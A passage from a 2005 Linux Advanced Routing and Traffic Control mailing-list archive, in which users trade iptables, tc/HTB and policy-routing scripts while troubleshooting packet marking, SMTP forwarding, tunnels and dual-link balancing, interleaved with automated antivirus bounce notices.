> 15 1260 MARK all -- * eth0 0.0.0.0/0 > 0.0.0.0/0 every 2th packet #1 MARK set 0x2 > > Chain POSTROUTING (policy ACCEPT 817 packets, 103K bytes) > pkts bytes target prot opt in out source destination > 0 0 all -- * eth0 0.0.0.0/0 > 0.0.0.0/0 MARK match 0x1 > 15 1260 all -- * eth0 0.0.0.0/0 > 0.0.0.0/0 MARK match 0x2 > [root@amd /home/andy]# cat ./nth-test > iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 > --packet 0 -j MARK --set-mark 1 > iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 > --packet 1 -j MARK --set-mark 2 > iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 1 > iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 2 > > Any Ideas anyone? Try adding "-m mark --mark X -j RETURN" rules after the MARK rules. The MARK target is non-terminal, so you are overwriting the mark in the second rule. Alternatively you can use "--start 1" in the one of the nth matches. Regards Patrick From netf@death.pl Fri Jan 14 10:09:10 2005 From: netf@death.pl (netf@death.pl) Date: Fri, 14 Jan 2005 11:09:10 +0100 (CET) Subject: [LARTC] tc class ls dev (device) ... segfault. In-Reply-To: <20050113132815.30cd1b67@dxpl.pdx.osdl.net> References: <53559.81.15.165.20.1105629441.squirrel@81.15.165.20> <20050113132815.30cd1b67@dxpl.pdx.osdl.net> Message-ID: <59127.81.15.165.20.1105697350.squirrel@81.15.165.20> > Are you using a current version of the iproute2 utilities? > One of the bugs I fixed about 6 months ago when I took over maintance > was teaching tc about the builtin pfifo_fast qdisc. > Yes. I tested tc utility of iproute2 versions : all 2.2.4 postfix'es, 2.4.7 postfix, 2.6.9 postfix and 2.6.10 ... behavior of tc utility is always the same :( : ATSLite ()# tc -Version tc utility, iproute2-ss050112 ATSLite ()# tc class ls dev eth1 do_page_fault() #2: sending SIGSEGV to tc for illegal read access from 00000000 (epc == 00000000, ra == 00409b70) Segmentation fault and as I said in previous post other things related to tc (shaping,qos etc etc) work well. I have done a little research and examine a buggy place. Problem is in q->print_copt(q,fp,tb[TCA_OPTIONS]) in print_class function of tc_class.c file. Unfortunatly i can't use any debugger such as gdb coz i don't have enough memory space. It's rtl8181 based Access Point (planet wap-1963a) with: 2 mb of flash memory 16mb of ram MIPS architecture. cat /proc/cpuinfo gives me: system type : Philips Nino processor : 0 cpu model : R3000 V0.0 ... iproute2 was cross compiled with nonmips (nonmips.sf.net) cross compiler gcc 3.3.3. The rules being tested are : #CLASS: download #!/bin/sh DEV=eth1 TC=/sbin/tc U32="filter add dev $DEV protocol ip parent 1:0 prio 1 u32" echo Delete previous root qdisc $TC qdisc del dev $DEV root >/dev/null 2>&1 echo Add root qdisc $TC qdisc add dev $DEV root handle 1: htb default 10 echo Add root class $TC class add dev $DEV parent 1: classid 1:1 htb rate 12500kbps ceil 12500kbps burst 2k echo Add default class $TC class add dev $DEV parent 1:1 classid 1:0x10 htb rate 12500kbps ceil 12500kbps burst 2k $TC qdisc add dev $DEV parent 1:0x10 handle 0x10: pfifo limit 5 echo Add class download, que pfifo limit 5 $TC class add dev $DEV parent 1:1 classid 1:0x20 htb rate 8kbps ceil 8kbps burst 2k prio 1 echo Add client net $TC class add dev $DEV parent 1:0x20 classid 1:0x21 htb rate 8kbps ceil 8kbps burst 2k prio 1 quantum 1500 $TC ${U32} match ip dst 192.168.200.2/32 flowid 1:0x21 $TC qdisc add dev $DEV parent 1:0x21 handle 0x21: pfifo limit 5 I hope there is a solution. thx in advance. From tomasz.paszkowski@e-wro.pl Fri Jan 14 10:21:46 2005 From: tomasz.paszkowski@e-wro.pl (Tomasz Paszkowski) Date: Fri, 14 Jan 2005 11:21:46 +0100 Subject: [LARTC] hashing filters In-Reply-To: <05ea01c4f8d1$a897a3e0$3400010a@ipkopb2qcn7w4z> References: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z> <20050112131121.GA5641@krezus.e-wro.net> <05ea01c4f8d1$a897a3e0$3400010a@ipkopb2qcn7w4z> Message-ID: <20050114102146.GA3465@krezus.e-wro.net> --IJpNTDwzlM2Ie8A6 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jan 12, 2005 at 07:08:03PM +0100, Valton Hashani wrote: > j=3D0; >=20 > while [ $j -le 254 ] >=20 > do > i=3D0; >=20 > while [ $i -le 254 ] > do > hexi=3D`echo "obase=3D16; $i" | bc` > echo tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hex= i: > match ip dst 192.168.$j.$i flowid 1:3 > tc filter add dev eth0 protocol ip parent 1:2 u32 ht $j:$hexi ma= tch > ip dst 192.168.$j.$i flowid 1:3 > i=3D$((i+1)) > done >=20 > j=3D$((j+1)) > done --IJpNTDwzlM2Ie8A6 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQFB5505cNXOL98XeysRAnm+AJ97NaiwKGPpnA7qPozY6DUAWpOCYgCfehRB lnbS3PFLP7Lt7Xd2HrWfW3E= =vK7R -----END PGP SIGNATURE----- --IJpNTDwzlM2Ie8A6-- From saz" This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C4FA28.D04B2D00 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi guys, i have a problem with a configuration what i'm trying to do.=20 I have two computers with linux, A and B, connected in the same network = with this configuration: PC1 A: 192.168.192.1 PC2 B: 192.168.192.30 The PC1 A is a firewall doing nat... this one is connected to the = internet via an adsl modem and of course it have its own public ip , and = the router B is a smtp server but connected behind the router A, what = i'm trying to do is redirect the smtp incoming traffic of the router A = to the router B using iproute2 and nerfilter tools This is the configuration on the router A: iptables -t mangle -A POSTROUTING -p tcp --dport 25 -j MARK --set-mark 1 = ( this marks the smtp packets with 1 ) i create a table called "smtp" in the rt_tables file. ip rule add fwmark 1 table smtp ( this is the rule for my table smtp ) and finally i declare a via in my smtp table, so the smtp traffic would = have to go by this way. ip route add default via 192.168.192.30 table smtp Ok... for example if i make a telnet to PC1 on the 25 port.. this should = redirect me to PC2 where is my real smtp server, but is not working... = any idea of why ? the PC2 have not a firewall.. Thank you!! ------=_NextPart_000_0005_01C4FA28.D04B2D00 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

Hi guys, i have a problem with a = configuration what=20 i'm trying to do.
I have two computers with linux, A = and B,=20 connected in the same network with this configuration:
 
PC1 A: 192.168.192.1
 
PC2 B: 192.168.192.30
 
The PC1 A is a firewall doing nat... = this one is=20 connected to the internet via an adsl modem and of course it have = its own=20 public ip , and the router B is a smtp server but connected behind the = router A,=20 what i'm trying to do is redirect the smtp incoming traffic of the = router A to=20 the router B using iproute2 and nerfilter tools
 
This is the configuration on the router = A:
 
iptables -t mangle -A = POSTROUTING=20 -p tcp --dport 25 -j MARK --set-mark 1 ( this marks the = smtp=20 packets with 1 )
 
i create a table called "smtp"  in = the=20 rt_tables file.
 
ip rule add fwmark 1 table = smtp (=20 this is the rule for my table smtp )
 
and finally i declare a via in my smtp = table, so=20 the smtp traffic would have to go by this way.
 
ip route add default via = 192.168.192.30=20 table smtp
 
Ok... for example if i make a = telnet to=20 PC1 on the 25 port.. this should redirect me to PC2 where is = my real=20 smtp server, but is not working... any idea of why ? the PC2 = have not=20 a firewall..
 
Thank you!!
------=_NextPart_000_0005_01C4FA28.D04B2D00-- From andy.furniss@dsl.pipex.com Fri Jan 14 15:10:02 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Fri, 14 Jan 2005 15:10:02 +0000 Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. In-Reply-To: <41E72982.5000205@trash.net> References: <1483.192.168.1.2.1105403313@maild.mine.nu> <41E5E91C.6050606@dsl.pipex.com> <41E6694A.2020203@dsl.pipex.com> <41E72982.5000205@trash.net> Message-ID: <41E7E0CA.5090509@dsl.pipex.com> Patrick McHardy wrote: > Andy Furniss wrote: > >> Seems still broken. >> >> I built vanilla(apart from nth) 2.6.10, new iptables 1.2.11 + >> pom-200400621 with runme extra only said y to nth. >> >> I see - >> >> Chain OUTPUT (policy ACCEPT 817 packets, 103K bytes) >> pkts bytes target prot opt in out source destination >> 15 1260 MARK all -- * eth0 0.0.0.0/0 >> 0.0.0.0/0 every 2th packet #0 MARK set 0x1 >> 15 1260 MARK all -- * eth0 0.0.0.0/0 >> 0.0.0.0/0 every 2th packet #1 MARK set 0x2 >> >> Chain POSTROUTING (policy ACCEPT 817 packets, 103K bytes) >> pkts bytes target prot opt in out source destination >> 0 0 all -- * eth0 0.0.0.0/0 >> 0.0.0.0/0 MARK match 0x1 >> 15 1260 all -- * eth0 0.0.0.0/0 >> 0.0.0.0/0 MARK match 0x2 >> [root@amd /home/andy]# cat ./nth-test >> iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 >> --packet 0 -j MARK --set-mark 1 >> iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 >> --packet 1 -j MARK --set-mark 2 >> iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 1 >> iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 2 >> >> Any Ideas anyone? > > > > Try adding "-m mark --mark X -j RETURN" rules after the MARK rules. The > MARK > target is non-terminal, so you are overwriting the mark in the second rule. > Alternatively you can use "--start 1" in the one of the nth matches. Thanks Patrick - I assumed that with the same counter and packet 0/1 that nth would only actually match alternate packets (start didn't work). So this works - iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 --packet 0 -j MARK --set-mark 1 iptables -t mangle -A OUTPUT -o eth0 -m mark --mark 1 -j RETURN iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 --packet 1 -j MARK --set-mark 2 iptables -t mangle -A OUTPUT -o eth0 -m mark --mark 2 -j RETURN but is over complicated really - Why I didn't do it like below in the first place I don't know iptables -t mangle -A OUTPUT -o eth0 -j MARK --set-mark 1 iptables -t mangle -A OUTPUT -o eth0 -m nth --every 2 -j MARK --set-mark 2 Andy. PS had to remove junk@maild.mine.nu from CC as my ISP server threw a domain not found - can someone else CC him please. From techsupport@sqliaison.com Sat Jan 15 06:30:20 2005 From: techsupport@sqliaison.com (techsupport@sqliaison.com) Date: Sat, 15 Jan 2005 01:30:20 -0500 Subject: [LARTC] SQLiaison E-Mail Virus Alert Message-ID: <000001c4facb$af782c10$50f7cdcd@sqliaison.com> This is a multi-part message in MIME format. ------=_NextPart_000_0001_01C4FAA1.C6A6DF00 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable SQLiaison Mail Server: GroupShield=C2=99 Alert=20 The email server has discovered a problem with the following email. Please note that the sender of the email will not be notified with this message. > More information : Date/Time sent: 15 Jan 2005 01:30:18 Subject line: [LARTC] Re: From: lartc-admin@mailman.ds9a.nl To: LARTC Action taken: Deleted Virus Found: W32/Bagle.ai@MM Reason: Anti-Virus Rule Group:=20 For additional information, please contact SQLiaison Support Team techsupport@sqliaison.com =20 =20 ------=_NextPart_000_0001_01C4FAA1.C6A6DF00 Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: 7bit SQLiaison Mail Server: GroupShield™ Alert

The email server has discovered a problem with the following email.

Please note that the sender of the email will not be notified with this message.

> More information :

Date/Time sent: 15 Jan 2005 01:30:18
Subject line: [LARTC] Re:
From: lartc-admin@mailman.ds9a.nl
To: LARTC
Action taken: Deleted
Virus Found: W32/Bagle.ai@MM
Reason: Anti-Virus
Rule Group:

For additional information, please contact SQLiaison Support Team

techsupport@sqliaison.com

 

------=_NextPart_000_0001_01C4FAA1.C6A6DF00-- From nug@sch.bme.hu Sat Jan 15 11:11:19 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Sat, 15 Jan 2005 12:11:19 +0100 Subject: [LARTC] iproute2 + netfilter problem In-Reply-To: <000801c4fa41$f5c80080$02c0a8c0@sazhost> References: <000801c4fa41$f5c80080$02c0a8c0@sazhost> Message-ID: <41E8FA57.8070608@sch.bme.hu> Hali, saz wrote: > Hi guys, i have a problem with a configuration what i'm trying to do. > I have two computers with linux, A and B, connected in the same network > with this configuration: > > PC1 A: 192.168.192.1 > > PC2 B: 192.168.192.30 > > The PC1 A is a firewall doing nat... this one is connected to the > internet via an adsl modem and of course it have its own public ip , and > the router B is a smtp server but connected behind the router A, what > i'm trying to do is redirect the smtp incoming traffic of the router A > to the router B using iproute2 and nerfilter tools > > This is the configuration on the router A: > > *iptables -t mangle -A POSTROUTING -p tcp --dport 25 -j MARK --set-mark > 1* ( this marks the smtp packets with 1 ) > > i create a table called "smtp" in the rt_tables file. > > *ip rule add fwmark 1 table smtp* ( this is the rule for my table smtp ) > > and finally i declare a via in my smtp table, so the smtp traffic would > have to go by this way. > > *ip route add default via 192.168.192.30 table smtp* > ** > Ok... for example if i make a telnet to PC1 on the 25 port.. this should > redirect me to PC2 where is my real smtp server, but is not > working... any idea of why ? the PC2 have not a firewall.. I think you totally misunderstood a few things. Routing is a different layer (IP) than port 25 (smtp, TCP). You can not make tcp port 25 redirect using routing tools. Here is an axample how to do it. $IPTABLES -t nat -A PREROUTING -i $EXTERNAL_INTERFACE -s $ANYWHERE -p tcp --dport 25 -j DNAT --to-destination 192.168.1.x:25 $IPTABLES -A FORWARD -i $EXTERNAL_INTERFACE -d $INTERNAL_NET -p TCP -s $ANYWHERE --sport $UNPRIVPORTS \ -d 192.168.1.x --dport 25 -j ACCEPT I recommend you to read a book about basic networking layers and/or iptables. -- Udv, Nandor From techsupport@sqliaison.com Sat Jan 15 17:41:14 2005 From: techsupport@sqliaison.com (techsupport@sqliaison.com) Date: Sat, 15 Jan 2005 12:41:14 -0500 Subject: [LARTC] SQLiaison E-Mail Virus Alert Message-ID: <000001c4fb29$68bb6900$50f7cdcd@sqliaison.com> This is a multi-part message in MIME format. ------=_NextPart_000_0001_01C4FAFF.7FE7D200 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable SQLiaison Mail Server: GroupShield=C2=99 Alert=20 The email server has discovered a problem with the following email. Please note that the sender of the email will not be notified with this message. > More information : Date/Time sent: 15 Jan 2005 12:41:14 Subject line: [LARTC] Re: From: lartc-admin@mailman.ds9a.nl To: LARTC Action taken: Deleted Virus Found: W32/Bagle@MM!pwdzip Reason: Anti-Virus Rule Group:=20 For additional information, please contact SQLiaison Support Team techsupport@sqliaison.com =20 =20 ------=_NextPart_000_0001_01C4FAFF.7FE7D200 Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: 7bit SQLiaison Mail Server: GroupShield™ Alert

The email server has discovered a problem with the following email.

Please note that the sender of the email will not be notified with this message.

> More information :

Date/Time sent: 15 Jan 2005 12:41:14
Subject line: [LARTC] Re:
From: lartc-admin@mailman.ds9a.nl
To: LARTC
Action taken: Deleted
Virus Found: W32/Bagle@MM!pwdzip
Reason: Anti-Virus
Rule Group:

For additional information, please contact SQLiaison Support Team

techsupport@sqliaison.com

 

------=_NextPart_000_0001_01C4FAFF.7FE7D200-- From ashling.odriscoll@cit.ie Sun Jan 16 23:56:55 2005 From: ashling.odriscoll@cit.ie (Ashling O'Driscoll) Date: Sun, 16 Jan 2005 23:56:55 -0000 Subject: [LARTC] Identification of TC Queueing Discipline Message-ID: <380-220051016235655498@cit.ie> Hi all, I previously mailed this list explaining that I been given the task of implementing a dynamic traffic shaping scheme on an existing network=2E I was looking for guidance on how I should approach this but unfortunately I was unable to provide much information about the existing traffic shaping system=2E I have recently obtained the existing tc scripts though and was hoping someone could help me identify what scheme is in place=2E=2E=2EI wa= s thinking it is HTB but as Im really new to this whole area, I thought someone could confirm/clear this up for me=2E Anyhow I have included some of the script below with the IP addresses represented by xxx=2Exxx=2Exxx=2Exxx Again thank you in advance and any help would be appreciated, Regards, Aisling=2E # use add=5Fbucket() to add the buckets and add=5Fip() to add filters for the hosts # # add=5Fbucket DEVICE BUCKET PARENT RATE CEIL # add=5Fip DEVICE IP[/MASK] BUCKET # add=5Fip=5Frange DEVICE IP MASK BUCKET # # top level buckets add=5Fbucket br0 10 - 4096 4096=20 add=5Fbucket eth2 10 - 4096 4096 add=5Fbucket eth3 10 - 2048 2048 add=5Fbucket eth2 9 10 64 2500 add=5Fbucket eth2 8 10 64 512 add=5Fbucket eth2 7 10 64 1024 # Part 1 WAN # ------ # Note that Everything else has to match all addresses as the Dest=20 # address in each outgoing packet could be anything=2E # Add src after x=2Ex=2Ex=2Ex address to limit upload speed # add=5Fbucket br0 11 10 64 512 add=5Fip br0 xxx=2Exxx=2Exxx=2Exxx 11 src # add=5Fip br0 xxx=2Exxx=2Exxx=2Exxx 11 src # add=5Fbucket br0 12 10 64 4096 add=5Fip br0 xxx=2Exxx=2Exxx=2Exxx 12 # add=5Fip br0 0=2E0=2E0=2E0/0 12 #Everything Else # Part 2 PAN # ------ # Note that Everything else has to match all addresses as the Dest # address in each outgoing packet could be anything=2E # add=5Fbucket eth3 11 10 64 2048 add=5Fip eth3 xxx=2Exxx=2Exxx=2Exxx 11 # S1 add=5Fip eth3 0=2E0=2E0=2E0/0 11 #Everything Else # Part 3 =20 # ------ =20 # Users on LAN side=2E Each needs to be assigned an individual bucket, so that=20 # all processes are treated from a single source=2E=20 # =20 # 3 sub-buckets below eth2 =20 # 11 - Buc 10-11 =20 # 12 - Buc 10-12 # 13 - Buc 10-13 # add=5Fbucket eth2 11 9 64 2500 add=5Fbucket eth2 12 9 64 2500 add=5Fbucket eth2 13 9 64 2000 add=5Fbucket eth2 14 9 64 256 add=5Fbucket eth2 15 9 64 256 # Let's just focus under bucket 12 for now=2E =20 # 21 - Buc 10-12-21 =20 # 22 - Buc 10-12-22 =20 # 33 - Buc 10-12-23 =20 add=5Fbucket eth2 21 11 64 2500=20 add=5Fbucket eth2 22 12 64 2500 =20 add=5Fbucket eth2 23 13 64 2000 add=5Fbucket eth2 80 23 64 512 #=2E=2E=20 add=5Fbucket eth2 81 23 64 512 #=2E=2E add=5Fbucket eth2 82 23 64 512 #=2E=2E add=5Fbucket eth2 83 23 64 512 #=2E=2E add=5Fbucket eth2 84 23 64 512 #=2E=2E add=5Fbucket eth2 85 23 64 512 #=2E=2E add=5Fbucket eth2 86 23 64 512 #=2E =20 # a bucket and ip address below eth2 (10) add=5Fbucket eth2 51 23 64 512 # 1=20 add=5Fip eth2 xxx=2Exxx=2Exxx=2Exxx 51 # a bucket and ip address below eth2 (10) =20 add=5Fbucket eth2 52 23 64 =20 add=5Fip eth2 xxx=2Exxx=2Exxx=2Exxx 52 add=5Fbucket eth2 53 23 64 512 =20 add=5Fip eth2 xxx=2Exxx=2Exxx=2Exxx 53 =09 =20 add=5Fbucket eth2 54 23 64 512=09 =20 add=5Fip eth2 xxx=2Exxx=2Exxx=2Exxx 54 = -------------------Legal Disclaimer-------------------------------------= -- The above electronic mail transmission is confidential and intended only = for the person to whom it is addressed. Its contents may be protected by = legal and/or professional privilege. Should it be received by you in erro= r please contact the sender at the above quoted email address. Any unauth= orised form of reproduction of this message is strictly prohibited. The I= nstitute does not guarantee the security of any information electronicall= y transmitted and is not liable if the information contained in this comm= unication is not a proper and complete record of the message as transmitt= ed by the sender nor for any delay in its receipt.= From andy.furniss@dsl.pipex.com Mon Jan 17 00:17:56 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Mon, 17 Jan 2005 00:17:56 +0000 Subject: [LARTC] htb script In-Reply-To: <001301c4f564$02d71000$fd00000a@jayesh> References: <001301c4f564$02d71000$fd00000a@jayesh> Message-ID: <41EB0434.3090207@dsl.pipex.com> jayesh wrote: > dear all > iam newbie , i have 256 kbits of down link and 64 kbits of up link iam using squid and htb i have got this while browsing the net , there are some few issues i need help > while running the script i want browsing to be as fast as possible , uplink especially kaaza should not eat my band width. > eth1 got public ip address and eth0 is internal with network 10.0.0.0/24 iam also using nat , how can i make squid incoporates with htb (squid uses 3128) > here is my script You need to patch squid to mark on hit/miss. http://www.docum.org/docum.org/faq/cache/65.html Andy. From andy.furniss@dsl.pipex.com Mon Jan 17 00:26:44 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Mon, 17 Jan 2005 00:26:44 +0000 Subject: [LARTC] dynamic bandwidth allocation In-Reply-To: <380-2200513121218967@cit.ie> References: <380-2200513121218967@cit.ie> Message-ID: <41EB0644.1060601@dsl.pipex.com> Ashling O'Driscoll wrote: > Hi, > > Hope someone can help me. I am a student who hass been given a > project to develop a dynamic bandwidth service. > > I currently have a linux router which at the moment gives users > static bandwidth and assigns each of them to a bucket. I have not > gotten information yet as to whether each bucket is serviced in a > round robin fashion or whether certain buckets get preferential > treatment (i.e. bucket 1 service 60% as opposed to bucket 2 40%). > > I need to implement dynamic bandwidth/traffic shaping based on > certain types of traffic/applications e.g.voice or based on > particluar users. So basically if voice traffic is being delayed and > not getting through,the bandwidth should be dynamically adjusted to > accommodate this and then readjusted once the problem is resolved. > > I have researched the iproute 2 package,tc, packet priorities, tos > bytes, queues etc the last few days but I am actually confused at > this stage by all the information. I have also come across a > scripting tool called "pacemaker" from st josephs university in > america which seems "close" to what I want but not quite it. > > If anyone could offer me advice on how I should approach this, > whether it's "do-able" and an estimation of what kind of task Im > undertaking i.e. how difficult and how much time this might take, I > would be VERY grateful. As I have not worked in industry before and > am not very familiar with linux, I dont know how possible/difficult > this project is or even how to approach it. > Have a look at HTB or HFSC, HFSC is quite new so you won't find as many examples. http://www.docum.org http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm Andy. From toto@fortesys.ro Mon Jan 17 13:48:39 2005 From: toto@fortesys.ro (Iosif Peterfi) Date: Mon, 17 Jan 2005 15:48:39 +0200 Subject: [LARTC] iproute2 + iptables - match the connection time or packets sent/recieved Message-ID: <009501c4fc9b$3fd8f4d0$da01a8c0@FORTEWKS001> Hello, I setup iproute2 and iptables on my box, is a P4 2000 Ghz / 1GB memory. I have setup squid and iptables to be a transparent proxy, with cache. I've read on lartc.org almost everything and i want to ask if there is a u32 match for the connection time or something like that, or an u32 match for the packet number in a connection. All i want to do is shape the web traffic for long conections wich are not HTML webpages, i want to slow down those connections. I know that can be overriden by stopin/resuming the transfer but i still want to do it since people start downloading from HTTP with many connections, during the day and leave the office, i have no time to hunt them, so i just want to classify those connections if is possible. If there is any patch for squid to classify URLS would be great, i`ll just put html/php/jsp/etc.. in the priority class. Toto -- This message was scanned for spam and viruses by BitDefender. For more information please visit http://linux.bitdefender.com/ From jasonb@edseek.com Mon Jan 17 16:50:27 2005 From: jasonb@edseek.com (Jason Boxman) Date: Mon, 17 Jan 2005 11:50:27 -0500 Subject: [LARTC] iproute2 + iptables - match the connection time or packets sent/recieved In-Reply-To: <009501c4fc9b$3fd8f4d0$da01a8c0@FORTEWKS001> References: <009501c4fc9b$3fd8f4d0$da01a8c0@FORTEWKS001> Message-ID: <200501171150.27568.jasonb@edseek.com> On Monday 17 January 2005 08:48, Iosif Peterfi wrote: > Hello, > > All i want to do is shape the web traffic for long conections wich are not > HTML webpages, i want to slow down those connections. > I know that can be overriden by stopin/resuming the transfer but i still > want to do it since people start downloading from HTTP with many > connections, during the day and leave the office, i have no time to hunt > them, so i just want to classify those connections if is possible. Sure, you can do that with the connbytes Netfilter module. After someone downloads some given amount of data you can reclassify that traffic from interactive-Web to bulk-Web or something similar. I've been meaning to do this myself, but haven't gotten to it. -- Jason Boxman Perl Programmer / *NIX Systems Administrator Shimberg Center for Affordable Housing | University of Florida http://edseek.com/ - Linux and FOSS stuff From techsupport@sqliaison.com Mon Jan 17 17:01:25 2005 From: techsupport@sqliaison.com (techsupport@sqliaison.com) Date: Mon, 17 Jan 2005 12:01:25 -0500 Subject: [LARTC] SQLiaison E-Mail Virus Alert Message-ID: <000001c4fcb6$2dc243d0$50f7cdcd@sqliaison.com> This is a multi-part message in MIME format. ------=_NextPart_000_0001_01C4FC8C.44EE85C0 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable SQLiaison Mail Server: GroupShield=C2=99 Alert=20 The email server has discovered a problem with the following email. Please note that the sender of the email will not be notified with this message. > More information : Date/Time sent: 17 Jan 2005 12:01:23 Subject line: [LARTC] Re: From: lartc-admin@mailman.ds9a.nl To: LARTC Action taken: Deleted Virus Found: W32/Bagle.ai@MM Reason: Anti-Virus Rule Group:=20 For additional information, please contact SQLiaison Support Team techsupport@sqliaison.com =20 =20 ------=_NextPart_000_0001_01C4FC8C.44EE85C0 Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: 7bit SQLiaison Mail Server: GroupShield™ Alert

The email server has discovered a problem with the following email.

Please note that the sender of the email will not be notified with this message.

> More information :

Date/Time sent: 17 Jan 2005 12:01:23
Subject line: [LARTC] Re:
From: lartc-admin@mailman.ds9a.nl
To: LARTC
Action taken: Deleted
Virus Found: W32/Bagle.ai@MM
Reason: Anti-Virus
Rule Group:

For additional information, please contact SQLiaison Support Team

techsupport@sqliaison.com

 

------=_NextPart_000_0001_01C4FC8C.44EE85C0-- From Ian Nicholls Mon Jan 17 23:33:17 2005 From: Ian Nicholls (Ian Nicholls) Date: Tue, 18 Jan 2005 10:33:17 +1100 Subject: [LARTC] iproute2 problem Message-ID: Hi, I have the following network configuration eth1 -- 150.101.118.158 - Public IP supplied by ISP eth0 -- 203.34.165.2 - Public IP allocated from my companies address range gir0 -- 203.34.165.1 - ip ip tunnel to transfer the public IP address range of my company The Routing is as follows : Destination Gateway Genmask Flags Metric Ref Use Iface 150.101.118.156 0.0.0.0 255.255.255.252 U 0 0 0 eth1 203.34.165.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 127.0.0.0 127.0.0.1 255.0.0.0 UG 0 0 0 lo 0.0.0.0 150.101.118.157 0.0.0.0 UG 0 0 0 eth1 What I want to do is have any traffic that comes down the gir0 link to return via the gir0 link, any traffic originating from the 203.34.165.0/24 address range to be NAT'd to the 150.101.118.156 range as the ISP charges nothing for traffic on this range to it's own mirrors e.t.c. In order to do this I have the following script run after the ip-ip tunnel is started #!/bin/bash /sbin/ip rule add from 203.34.165.1 table Tunnel /sbin/ip route add default via 203.34.165.1 dev gir0 table Tunnel /sbin/ip route flush cache Now for the crazy problem...... Email coming in to 203.34.165.1 and 203.34.165.2 from some locations like hotmail.com does not make it. I have done a tcpdump and the emails that get lost start OK and somewhere in the transfer the packets get lost and connection fails. Most other locations work fine, e.g. gmail.com. I would normally just write this off as another hotmail issue and not worry about it but this is happening to a number of other email sources as well. What appears to be happening is that the traffic starts out fine going back and forward over the ip-ip tunnel like I expect and then a packet does not go via this path, it just goes out the interface with the default route. This subsequently gets lost somewhere and no ack is received. kernel and ip utilities versions are as follows: ip -V ip utility, iproute2-ss040831 uname -a Linux spud.babelsoft.com.au. 2.6.10-gentoo-r4 #1 Thu Jan 13 21:08:50 EST 2005 i686 AMD Athlon(tm) XP 1700+ AuthenticAMD GNU/Linux Does anyone have any ideas. Also for some strange reason the server with this problem also refuse to use the 150.101.118.158 address as an MX, which I am unable to determine the cause of. Ian Nicholls From sanjeev_ravindran@linuxmail.org Tue Jan 18 06:11:15 2005 From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran) Date: Tue, 18 Jan 2005 14:11:15 +0800 Subject: [LARTC] Doubt regarding priority of classes with HTB Message-ID: <20050118061115.8420123EF73@ws5-4.us4.outblaze.com> Hi, I'm a bit confused with the priority of different classes with HTB. How it = will be? Will the class with lowest no: have maximum priority? Any help is most appreciated, Thanks in advance, Sanjeev=20 --=20 ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org=20 This allows you to send and receive SMS through your mailbox. Powered by Outblaze From roderick tapang Tue Jan 18 07:20:42 2005 From: roderick tapang (roderick tapang) Date: Tue, 18 Jan 2005 15:20:42 +0800 Subject: [LARTC] failover works - but balancing does not Message-ID: here's the setup (two dsl - same provider) +-----> link1 LAN----- linux box --| |----------internet +-----> link2 the setup is ok in terms of the failover requirement. the other link takes over when one is down. however, there is a very noticeable lag when both lines are up. i've tried changing the weight value to a higher one but the links are still under utilized and some client machines playing games or mostly disconnected. taking down one link makes the connection ok. any suggestions? do i need to patch the kernel? below is the script i'm using on a mandrake 10.1 box. thanks. erik #!/bin/sh # Iptables userspace executable IPTABLES="/sbin/iptables" # Internal Interface NET_INT_INT=eth1 # Internal IP NET_INT_IP=192.168.0.101 # Internal Subnet NET_INT_SUB=/24 # Internal Network NET_INT_NET=192.168.0.0 # First external interface NET_EXT_INT1=eth0 # First external IP NET_EXT_IP1=192.168.1.7 # First external interface's gateway NET_EXT_GW1=192.168.1.1 # Second external interface NET_EXT_INT2=eth2 # Second external IP NET_EXT_IP2=192.168.1.3 # Second external interface's gateway NET_EXT_GW2=192.168.1.1 echo "Flushing All Tables" $IPTABLES -F $IPTABLES -F -t nat $IPTABLES -F -t mangle $IPTABLES -X -t nat $IPTABLES -X -t mangle $IPTABLES -X $IPTABLES -t mangle -N ETH0 $IPTABLES -t mangle -F ETH0 $IPTABLES -t mangle -A ETH0 -j MARK --set-mark 1 $IPTABLES -t mangle -N ETH2 $IPTABLES -t mangle -F ETH2 $IPTABLES -t mangle -A ETH2 -j MARK --set-mark 2 $IPTABLES -t nat -N SPOOF_ETH0 $IPTABLES -t nat -F SPOOF_ETH0" $IPTABLES -t nat -A SPOOF_ETH0 -j SNAT --to ${NET_EXT_IP1} $IPTABLES -t nat -N SPOOF_ETH2 $IPTABLES -t nat -F SPOOF_ETH2H2 " $IPTABLES -t nat -A SPOOF_ETH2 -j SNAT --to ${NET_EXT_IP2} echo "Setting some local network rules..." $IPTABLES -A INPUT -p icmp -s ${NET_INT_NET}/24 -d ${NET_INT_IP} -j 